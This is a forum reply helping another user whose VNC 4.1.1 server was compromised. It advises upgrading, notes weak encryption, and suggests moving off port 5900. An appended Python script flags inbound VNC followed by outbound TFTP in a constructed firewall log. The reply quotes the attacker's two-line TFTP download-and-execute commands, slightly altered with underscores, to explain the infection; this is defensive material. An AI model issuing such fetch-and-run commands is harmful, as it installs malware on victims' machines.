Hi leiw,
May you find inspiration and help in the forum.
1. Version 4.1.1 you cannot get rid of fast enough, especially now that you have seen that somebody knows, perhaps accidentally, that your servers exist.
Upgrading to 4.1.2 gets you over the initial flaw, but if you are using the free version I would suggest you review this for use over the internet. Reading the small print/manual or specs more closely, this is not recommended when you cross the internet jungle, as the password encryption is not strong. The normal session information, I understand, is just open to anybody with no encryption.
I forgot this and happily used it for 12 months until it went bad. If your company information is important you should consider the 'bigger' versions, which have much better encryption and encryption on the session transmissions. Convince yourself you understand all this, because I am not an expert; I just have some reasonable understanding of various aspects of computing.
Consider moving away from using the default port of 5900; perhaps that may give you some protection. "Everybody" knows that port and will almost by default have it in their software. It just makes it a little bit harder for unwanted sniffing.
I am deliberately using the underscore in the next lines:
tftp -i 0.0.0.0 GET msqrsm_exe
msqrsm_exe
My understanding is that the first line downloads the dirty file to IP address 0.0.0.0, where I am not sure of the importance of 0.0.0.0; I had expected your public IP address here, which could be a very good thing.
The second line executes msqrsm_exe. If it has been downloaded to your machines or network, you must go looking for how to get rid of what it has downloaded.
The only place I have seen help is PREVX1; I am still trying to find out more. Actually, I have put our machine on a sort of hold, as I have run out of energy to focus on just this bastard.
Like you, I still have no idea how our machine got activated. Because we used VNC 4.1.1, I am assuming that somehow an accidental port scan revealed our existence on the net, despite running in stealth mode behind a software firewall. Unfortunately the NAT router was not installed on the cable modem. We did not have that extra protection, which you seem to have, as you are on a 192.168.1.x network.
Do you have a software firewall as well as NAT? I may be a little bit out in deep water, as you talked about servers and I talk about hosts. You may be better protected.
Do you have the facility to log all incoming and outgoing traffic? If so, this should reveal a lot about msqrsm_exe.
Where it came from? No idea.
Good luck and I hope it did not run.
C.
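The post above suggests that logging all incoming and outgoing traffic would reveal what the dropped file does. The following is an added example, not code from the post or from any VNC project, of the check a practitioner would run over such a log: it flags a LAN host that accepts an inbound connection on the VNC port from a non-RFC1918 address and then, shortly afterwards, makes an outbound TFTP (UDP/69) request of the kind the quoted `tftp -i ... GET` command would produce. The log format (timestamp, direction, src/dst, proto, dport, action) and the sample lines are constructed for the example; the VNC port is a parameter because the post recommends moving off 5900.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample firewall log (not from the post). One LAN host accepts an
# inbound VNC connection from an outside address and about two and a half
# minutes later sends outbound TFTP; the other lines are noise and a bad line.
SAMPLE_LOG = """\
2006-05-16 02:11:03 fw IN src=198.51.100.7 dst=192.168.1.10 proto=TCP dport=5900 action=ACCEPT
2006-05-16 02:11:04 fw IN src=198.51.100.7 dst=192.168.1.10 proto=TCP dport=5900 action=ACCEPT
2006-05-16 02:13:41 fw OUT src=192.168.1.10 dst=198.51.100.7 proto=UDP dport=69 action=ACCEPT
2006-05-16 02:13:42 fw OUT src=192.168.1.10 dst=198.51.100.7 proto=UDP dport=69 action=ACCEPT
2006-05-16 03:05:12 fw IN src=203.0.113.9 dst=192.168.1.10 proto=TCP dport=5900 action=DROP
2006-05-16 09:30:00 fw OUT src=192.168.1.20 dst=192.168.1.1 proto=UDP dport=53 action=ACCEPT
2006-05-16 10:00:00 fw IN src=192.168.1.20 dst=192.168.1.30 proto=TCP dport=5900 action=ACCEPT
this line is garbage and must be skipped
"""

# Assumed key=value layout of one firewall log line.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ (?P<dir>IN|OUT) "
    r"src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) proto=(?P<proto>\w+) "
    r"dport=(?P<dport>\d+) action=(?P<action>\w+)$"
)

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_lan(ip):
    """True for RFC1918 addresses, i.e. hosts behind the NAT router."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def parse_log(text):
    """Turn log lines into event dicts; lines that do not match the layout are dropped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
        ev["dport"] = int(ev["dport"])
        events.append(ev)
    return events


def outbound_tftp(events):
    """Every (lan_host, remote) pair where a LAN host sent TFTP out. A workstation
    normally never speaks TFTP to the internet, so each pair deserves a look."""
    pairs = []
    for ev in events:
        if ev["dir"] == "OUT" and ev["proto"] == "UDP" and ev["dport"] == 69 \
                and ev["action"] == "ACCEPT" and is_lan(ev["src"]):
            pair = (ev["src"], ev["dst"])
            if pair not in pairs:
                pairs.append(pair)
    return pairs


def vnc_then_tftp(events, vnc_ports=(5900,), window_s=600):
    """Flag LAN hosts that accepted an inbound VNC connection from a non-LAN
    address and then sent outbound TFTP within window_s seconds of it."""
    inbound_vnc = defaultdict(list)  # lan host -> [(ts, remote address)]
    for ev in events:
        if ev["dir"] == "IN" and ev["action"] == "ACCEPT" and ev["proto"] == "TCP" \
                and ev["dport"] in vnc_ports and not is_lan(ev["src"]):
            inbound_vnc[ev["dst"]].append((ev["ts"], ev["src"]))

    findings, seen = [], set()
    for ev in events:
        if not (ev["dir"] == "OUT" and ev["proto"] == "UDP" and ev["dport"] == 69):
            continue
        host = ev["src"]
        for ts, remote in inbound_vnc.get(host, []):
            delta = (ev["ts"] - ts).total_seconds()
            if 0 <= delta <= window_s and (host, remote) not in seen:
                seen.add((host, remote))
                findings.append({"host": host, "vnc_from": remote,
                                 "tftp_to": ev["dst"], "seconds_after_vnc": int(delta)})
                break
    return findings


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for f in vnc_then_tftp(evs):
        print("VNC login from %(vnc_from)s on %(host)s, then TFTP to %(tftp_to)s "
              "%(seconds_after_vnc)ds later" % f)
    for host, dst in outbound_tftp(evs):
        print("outbound TFTP: %s -> %s" % (host, dst))
```

Run it against your own firewall export after adapting LINE_RE to the layout you actually log; if the server was moved off 5900, pass that port in `vnc_ports`. The two checks are separate on purpose: the time-correlated one points at the entry vector, while any outbound TFTP at all from a LAN host is worth chasing even when the preceding VNC connection was not logged.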